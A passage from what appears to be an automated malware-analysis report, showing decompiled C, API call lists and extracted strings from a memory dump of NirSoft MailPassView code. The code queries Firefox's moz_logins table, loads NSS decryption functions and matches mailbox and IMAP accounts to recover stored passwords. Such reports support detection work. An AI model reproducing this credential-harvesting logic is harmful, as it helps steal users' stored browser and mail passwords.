						if(_v24 != _t196) {
							strcpy( &_v5684, _v24);
						}
						if(_v32 != _t196) {
							strcpy( &_v4660, _v32);
						}
						if(_v16 != _t196) {
							strcpy( &_v3636, _v16);
						}
						_v332 = _t196;
						memset( &_v331, _t196, 0xff);
						_v588 = _t196;
						memset( &_v587, _t196, 0xff);
						_t239 = _t240 + 0x18;
						E0040CD27(_v8, _t226,  &_v588);
						E0040CD27(_v20, _t226,  &_v332);
						_v8 = _t196;
						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
							_v16 = _t226 + 0x468;
							do {
								_t237 = E0040D438(_v8, _v16);
								_v2612 = _t196;
								memset( &_v2611, _t196, 0x261);
								_v1996 = _t196;
								memset( &_v1995, _t196, 0x261);
								_t86 = _t237 + 0x104; // 0x104
								_t229 = _t86;
								sprintf( &_v2612, "mailbox://%s", _t229);
								sprintf( &_v1996, "imap://%s", _t229);
								_push( &_v3636);
								_t170 =  &_v2612;
								_push(_t170);
								L004115B2();
								_t239 = _t239 + 0x38;
								if(_t170 == 0) {
									L31:
									_t94 = _t237 + 0x304; // 0x304
									E004060D0(0xff, _t94,  &_v588);
									_t96 = _t237 + 0x204; // 0x204
									E004060D0(0xff, _t96,  &_v332);
									_t196 = 0;
									goto L32;
								}
								_push( &_v3636);
								_t177 =  &_v1996;
								_push(_t177);
								L004115B2();
								if(_t177 != 0) {
									goto L32;
								}
								goto L31;
								L32:
								_v8 =  &(_v8[1]);
								_t175 = _a4;
							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
							_t226 = _t175;
						}
						goto L11;
						L34:
						if(_a8 != _t196 && _v48 != _t196) {
							_v48(_a8);
						}
						if(_v44 != _t196) {
							_v44(_v12);
						}
						goto L39;
					}
				}
			}























































                                                  0x0040ce30
                                                  0x0040ce38
                                                  0x0040ce41
                                                  0x0040ce45
                                                  0x0040ce48
                                                  0x0040ce4f
                                                  0x0040d1e9
                                                  0x0040d1e9
                                                  0x0040d1e9
                                                  0x0040ce55
                                                  0x0040ce58
                                                  0x0040ce5c
                                                  0x0040ce6a
                                                  0x0040ce5e
                                                  0x0040ce65
                                                  0x0040ce67
                                                  0x0040ce6f
                                                  0x0040d1d5
                                                  0x0040d1d7
                                                  0x00000000
                                                  0x00000000
                                                  0x0040d1dd
                                                  0x0040d1e3
                                                  0x00000000
                                                  0x0040ce75
                                                  0x0040ce7f
                                                  0x0040ce89
                                                  0x0040d1c9
                                                  0x0040d1c9
                                                  0x0040d1cc
                                                  0x0040d1d1
                                                  0x0040d1d3
                                                  0x0040d1d3
                                                  0x00000000
                                                  0x0040ce8f
                                                  0x0040ce9c
                                                  0x0040ce9f
                                                  0x0040cea6
                                                  0x0040ceb9
                                                  0x0040cebf
                                                  0x0040cec4
                                                  0x0040ced6
                                                  0x0040cef5
                                                  0x0040cefe
                                                  0x0040cf0b
                                                  0x0040cf0f
                                                  0x0040cf13
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cf1c
                                                  0x0040cf1f
                                                  0x0040cf33
                                                  0x0040cf36
                                                  0x0040cf36
                                                  0x00000000
                                                  0x0040cf39
                                                  0x0040cf3c
                                                  0x0040cf47
                                                  0x0040cf3e
                                                  0x0040cf41
                                                  0x0040cf44
                                                  0x0040cf4f
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cf62
                                                  0x0040cf68
                                                  0x0040cf7a
                                                  0x0040cf7f
                                                  0x0040cf94
                                                  0x0040cfa3
                                                  0x0040cfb3
                                                  0x0040cfc3
                                                  0x0040cfd3
                                                  0x0040cfe0
                                                  0x0040cfe3
                                                  0x0040cfed
                                                  0x0040cff3
                                                  0x0040cff7
                                                  0x0040d003
                                                  0x0040d009
                                                  0x0040d00d
                                                  0x0040d019
                                                  0x0040d01f
                                                  0x0040d023
                                                  0x0040d02f
                                                  0x0040d035
                                                  0x0040d039
                                                  0x0040d045
                                                  0x0040d04b
                                                  0x0040d04f
                                                  0x0040d05b
                                                  0x0040d061
                                                  0x0040d070
                                                  0x0040d076
                                                  0x0040d084
                                                  0x0040d08a
                                                  0x0040d08f
                                                  0x0040d09e
                                                  0x0040d0af
                                                  0x0040d0ba
                                                  0x0040d0bd
                                                  0x0040d0c9
                                                  0x0040d0cc
                                                  0x0040d0dd
                                                  0x0040d0e7
                                                  0x0040d0ed
                                                  0x0040d0fb
                                                  0x0040d101
                                                  0x0040d106
                                                  0x0040d106
                                                  0x0040d119
                                                  0x0040d12b
                                                  0x0040d136
                                                  0x0040d137
                                                  0x0040d13d
                                                  0x0040d13e
                                                  0x0040d143
                                                  0x0040d148
                                                  0x0040d163
                                                  0x0040d16a
                                                  0x0040d175
                                                  0x0040d181
                                                  0x0040d187
                                                  0x0040d18e
                                                  0x00000000
                                                  0x0040d18e
                                                  0x0040d150
                                                  0x0040d151
                                                  0x0040d157
                                                  0x0040d158
                                                  0x0040d161
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040d190
                                                  0x0040d190
                                                  0x0040d193
                                                  0x0040d199
                                                  0x0040d1a5
                                                  0x0040d1a5
                                                  0x00000000
                                                  0x0040d1ac
                                                  0x0040d1af
                                                  0x0040d1b9
                                                  0x0040d1bc
                                                  0x0040d1c0
                                                  0x0040d1c5
                                                  0x0040d1c8
                                                  0x00000000
                                                  0x0040d1c0
                                                  0x0040ce89

                                                  APIs
                                                    • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                    • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                    • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                    • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                    • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                    • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                    • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                    • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                    • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                  • memset.MSVCRT ref: 0040CEA6
                                                  • memset.MSVCRT ref: 0040CEBF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                  • memset.MSVCRT ref: 0040CF68
                                                  • memset.MSVCRT ref: 0040CF7A
                                                  • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                  • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                  • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                  • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                  • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                  • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                  • memset.MSVCRT ref: 0040D076
                                                  • memset.MSVCRT ref: 0040D08A
                                                  • memset.MSVCRT ref: 0040D0ED
                                                  • memset.MSVCRT ref: 0040D101
                                                  • sprintf.MSVCRT ref: 0040D119
                                                  • sprintf.MSVCRT ref: 0040D12B
                                                  • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                  • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                  • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                  Strings
                                                  • mailbox://%s, xrefs: 0040D113
                                                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                  • imap://%s, xrefs: 0040D125
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                  • API String ID: 4276617627-3913509535
                                                  • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                  • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                  • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                  • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A774, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 285windowregistrystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E0040A774(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HMENU__* _t121;
				struct HWND__* _t122;
				intOrPtr _t128;
				int _t133;
				intOrPtr _t135;
				int _t149;
				void* _t166;
				void* _t174;
				void* _t178;
				void* _t185;
				intOrPtr _t194;
				void* _t197;
				void* _t198;
				intOrPtr _t200;
				intOrPtr _t201;
				void* _t202;
				int _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t213;

				_t213 = __eflags;
				_t208 = _t210 - 0x78;
				_t211 = _t210 - 0xb8;
				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
				 *((char*)(_t208 - 0x37)) = 1;
				 *(_t208 - 0x40) = 0;
				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
				 *((char*)(_t208 - 0x38)) = 0;
				 *((char*)(_t208 - 0x36)) = 0;
				 *((char*)(_t208 - 0x35)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 0x2c) = 1;
				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
				 *((char*)(_t208 - 0x24)) = 4;
				 *((char*)(_t208 - 0x23)) = 0;
				 *((char*)(_t208 - 0x22)) = 0;
				 *((char*)(_t208 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 - 0x18)) = 5;
				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
				 *((char*)(_t208 - 0x10)) = 4;
				 *((char*)(_t208 - 0xf)) = 0;
				 *((char*)(_t208 - 0xe)) = 0;
				 *((char*)(_t208 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 4) = 2;
				 *_t208 = 0x9c48;
				 *((char*)(_t208 + 4)) = 4;
				 *((char*)(_t208 + 5)) = 0;
				 *((char*)(_t208 + 6)) = 0;
				 *((char*)(_t208 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x10)) = 3;
				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
				 *((char*)(_t208 + 0x18)) = 4;
				 *((char*)(_t208 + 0x19)) = 0;
				 *((char*)(_t208 + 0x1a)) = 0;
				 *((char*)(_t208 + 0x1b)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x24)) = 0;
				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
				 *((char*)(_t208 + 0x2c)) = 4;
				 *((char*)(_t208 + 0x2d)) = 0;
				 *((char*)(_t208 + 0x2e)) = 0;
				 *((char*)(_t208 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x38)) = 6;
				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
				 *((char*)(_t208 + 0x40)) = 4;
				 *((char*)(_t208 + 0x41)) = 0;
				 *((char*)(_t208 + 0x42)) = 0;
				 *((char*)(_t208 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
				 *((char*)(_t208 + 0x54)) = 4;
				 *((char*)(_t208 + 0x55)) = 0;
				 *((char*)(_t208 + 0x56)) = 0;
				 *((char*)(_t208 + 0x57)) = 0;
				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
				asm("stosd");
				_t198 = 0x66;
				asm("stosd");
				_t121 = E00407BB9(_t198);
				_t194 =  *((intOrPtr*)(_t208 + 0x70));
				 *(_t194 + 0x11c) = _t121;
				_t122 = SetMenu( *(_t194 + 0x108), _t121);
				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
				 *(_t194 + 0x114) = _t122;
				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
				_t128 =  *((intOrPtr*)(_t194 + 0x370));
				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
				if(_t173 <= 0) {
					L3:
					_t201 =  *((intOrPtr*)(_t194 + 0x370));
					E00409EC4(_t201);
					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
						E00409E32(_t133, _t173, _t194, _t201);
					}
					_t202 = 0x68;
					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
						_t174 = 0x412466;
					} else {
						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
							_t174 = 0;
						} else {
							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
						}
					}
					_push("/noloadsettings");
					_push(_t174);
					L004115B2();
					if(_t135 == 0) {
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
					}
					E0040AF17(_t194, 0);
					 *( *(_t194 + 0x36c)) = 1;
					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
					if( *0x417660 == 0) {
						E00406172(0x417660);
						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x417660);
						}
					}
					_t204 = strlen(0x417660);
					 *_t211 = "report.html";
					_t99 = strlen(??) + 1; // 0x1
					_t223 = _t204 + _t99 - 0x104;
					if(_t204 + _t99 >= 0x104) {
						 *((char*)(_t194 + 0x264)) = 0;
					} else {
						E004062AD(_t194 + 0x264, 0x417660, "report.html");
					}
					_push(1);
					_t178 = 0x30;
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
					_t205 = _t194;
					 *(_t194 + 0x374) = _t149;
					E0040A27F(0, 1, _t205, _t223);
					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
					 *(_t208 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t207 = _t200 + 0xc;
					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
					do {
						_t173 =  *((intOrPtr*)(_t207 - 8));
						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
						_t211 = _t211 + 0x10;
						_t207 = _t207 + 0x14;
						_t82 = _t208 + 0x74;
						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
					} while ( *_t82 != 0);
					goto L3;
				}
			}





























                                                  0x0040a774
                                                  0x0040a775
                                                  0x0040a779
                                                  0x0040a782
                                                  0x0040a785
                                                  0x0040a78d
                                                  0x0040a790
                                                  0x0040a793
                                                  0x0040a796
                                                  0x0040a799
                                                  0x0040a79f
                                                  0x0040a7a0
                                                  0x0040a7a1
                                                  0x0040a7a8
                                                  0x0040a7af
                                                  0x0040a7b3
                                                  0x0040a7b6
                                                  0x0040a7b9
                                                  0x0040a7c1
                                                  0x0040a7c2
                                                  0x0040a7c3
                                                  0x0040a7ca
                                                  0x0040a7d1
                                                  0x0040a7d5
                                                  0x0040a7d8
                                                  0x0040a7db
                                                  0x0040a7e3
                                                  0x0040a7e4
                                                  0x0040a7e5
                                                  0x0040a7ec
                                                  0x0040a7f3
                                                  0x0040a7f7
                                                  0x0040a7fa
                                                  0x0040a7fd
                                                  0x0040a805
                                                  0x0040a806
                                                  0x0040a807
                                                  0x0040a80e
                                                  0x0040a815
                                                  0x0040a819
                                                  0x0040a81c
                                                  0x0040a81f
                                                  0x0040a827
                                                  0x0040a828
                                                  0x0040a829
                                                  0x0040a82c
                                                  0x0040a833
                                                  0x0040a837
                                                  0x0040a83a
                                                  0x0040a83d
                                                  0x0040a845
                                                  0x0040a846
                                                  0x0040a847
                                                  0x0040a84e
                                                  0x0040a855
                                                  0x0040a859
                                                  0x0040a85c
                                                  0x0040a85f
                                                  0x0040a867
                                                  0x0040a868
                                                  0x0040a869
                                                  0x0040a870
                                                  0x0040a877
                                                  0x0040a87b
                                                  0x0040a87e
                                                  0x0040a881
                                                  0x0040a884
                                                  0x0040a88d
                                                  0x0040a890
                                                  0x0040a891
                                                  0x0040a892
                                                  0x0040a897
                                                  0x0040a8a1
                                                  0x0040a8a7
                                                  0x0040a8c2
                                                  0x0040a8d4
                                                  0x0040a8da
                                                  0x0040a927
                                                  0x0040a95f
                                                  0x0040a964
                                                  0x0040a96a
                                                  0x0040a972
                                                  0x0040a97e
                                                  0x0040a981
                                                  0x0040a9aa
                                                  0x0040a9aa
                                                  0x0040a9b2
                                                  0x0040a9cd
                                                  0x0040a9d9
                                                  0x0040a9db
                                                  0x0040a9db
                                                  0x0040a9e2
                                                  0x0040a9e8
                                                  0x0040a9ee
                                                  0x0040a9f7
                                                  0x0040aa0c
                                                  0x0040a9f9
                                                  0x0040a9fc
                                                  0x0040aa08
                                                  0x0040a9fe
                                                  0x0040aa03
                                                  0x0040aa03
                                                  0x0040a9fc
                                                  0x0040aa11
                                                  0x0040aa16
                                                  0x0040aa17
                                                  0x0040aa20
                                                  0x0040aa2c
                                                  0x0040aa2c
                                                  0x0040aa35
                                                  0x0040aa40
                                                  0x0040aa52
                                                  0x0040aa63
                                                  0x0040aa65
                                                  0x0040aa73
                                                  0x0040aa7b
                                                  0x0040aa7b
                                                  0x0040aa73
                                                  0x0040aa87
                                                  0x0040aa89
                                                  0x0040aa95
                                                  0x0040aa99
                                                  0x0040aa9f
                                                  0x0040aaba
                                                  0x0040aaa1
                                                  0x0040aab1
                                                  0x0040aab7
                                                  0x0040aac6
                                                  0x0040aaca
                                                  0x0040aacb
                                                  0x0040aae2
                                                  0x0040aaec
                                                  0x0040aaf4
                                                  0x0040aaf6
                                                  0x0040aafc
                                                  0x0040ab0d
                                                  0x0040ab29
                                                  0x0040ab30
                                                  0x0040ab37
                                                  0x0040ab53
                                                  0x0040a983
                                                  0x0040a983
                                                  0x0040a986
                                                  0x0040a989
                                                  0x0040a991
                                                  0x0040a99a
                                                  0x0040a99f
                                                  0x0040a9a2
                                                  0x0040a9a5
                                                  0x0040a9a5
                                                  0x0040a9a5
                                                  0x00000000
                                                  0x0040a989

                                                  APIs
                                                    • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
                                                    • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                  • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                  • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A8DA
                                                  • LoadImageA.USER32 ref: 0040A8F0
                                                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                  • CreateWindowExA.USER32 ref: 0040A950
                                                  • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                  • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                  • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                  • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                  • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                  • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                  • strlen.MSVCRT ref: 0040AA82
                                                  • strlen.MSVCRT ref: 0040AA90
                                                  • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                    • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                    • Part of subcall function 00404925: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404966
                                                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AB37
                                                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AB4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                  • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                  • API String ID: 873469642-860065374
                                                  • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                  • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                  • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                  • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040DB39, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
				char _v0;
				struct HWND__* _v4;
				void* __edi;
				void* _t44;
				void* _t58;
				int _t59;
				int _t61;
				int _t62;
				long _t66;
				struct HWND__* _t93;
				intOrPtr _t122;
				unsigned int _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t128 = _t127 & 0xfffffff8;
				E004118A0(0x1424, __ecx);
				_t44 = _a8 - 0x110;
				if(_t44 == 0) {
					E00406491(__edx, _a4);
					 *_t128 = 0x7ff;
					_a3104 = 0;
					memset( &_a3105, 0, ??);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					memset( &_a10, 0, 0xfb);
					_a520 = 0;
					memset( &_a521, 0, 0xff);
					_a264 = 0;
					memset( &_a265, 0, 0xff);
					_a1056 = 0;
					memset( &_a1057, 0, 0x3ff);
					_a2080 = 0;
					memset( &_a2081, 0, 0x3ff);
					_t134 = _t128 + 0x48;
					_t58 = GetCurrentProcess();
					_t102 =  &_a520;
					_v4 = _t58;
					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
					__eflags = _t59;
					if(_t59 != 0) {
						E00406585( &_a1056,  &_a520, 4);
						_pop(_t102);
					}
					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00406585( &_a2080,  &_a264, 0);
						_pop(_t102);
					}
					_t62 = E0040629C();
					__eflags = _t62;
					if(_t62 == 0) {
						E0040E056();
					} else {
						E0040E0DA();
					}
					__eflags =  *0x417514;
					if(__eflags != 0) {
						L17:
						_a776 = 0;
						memset( &_a780, 0, 0x114);
						_t122 =  *0x416e7c; // 0x0
						_t134 = _t134 + 0xc;
						_t66 = GetCurrentProcessId();
						 *0x417108 = 0;
						E0040E255(_t102, __eflags, _t66, _t122);
						__eflags =  *0x417108;
						if( *0x417108 != 0) {
							memcpy( &_a776, 0x416ff0, 0x118);
							_t134 = _t134 + 0xc;
							__eflags =  *0x417108;
							if( *0x417108 != 0) {
								strcpy( &_v0, E004061E6( &_a784));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x417518;
						if(__eflags == 0) {
							L20:
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);
							SendMessageA(_v4, 0x301, 0, 0);
							SendMessageA(_v4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}


















                                                  0x0040db3c
                                                  0x0040db44
                                                  0x0040db4c
                                                  0x0040db54
                                                  0x0040dbd8
                                                  0x0040dbdf
                                                  0x0040dbef
                                                  0x0040dbf6
                                                  0x0040dc04
                                                  0x0040dc08
                                                  0x0040dc14
                                                  0x0040dc16
                                                  0x0040dc2d
                                                  0x0040dc34
                                                  0x0040dc46
                                                  0x0040dc4d
                                                  0x0040dc64
                                                  0x0040dc6b
                                                  0x0040dc7d
                                                  0x0040dc84
                                                  0x0040dc89
                                                  0x0040dc8c
                                                  0x0040dc9e
                                                  0x0040dcac
                                                  0x0040dcb1
                                                  0x0040dcb3
                                                  0x0040dcb5
                                                  0x0040dcc8
                                                  0x0040dcce
                                                  0x0040dcce
                                                  0x0040dce7
                                                  0x0040dce9
                                                  0x0040dceb
                                                  0x0040dcfd
                                                  0x0040dd03
                                                  0x0040dd03
                                                  0x0040dd04
                                                  0x0040dd09
                                                  0x0040dd0b
                                                  0x0040dd14
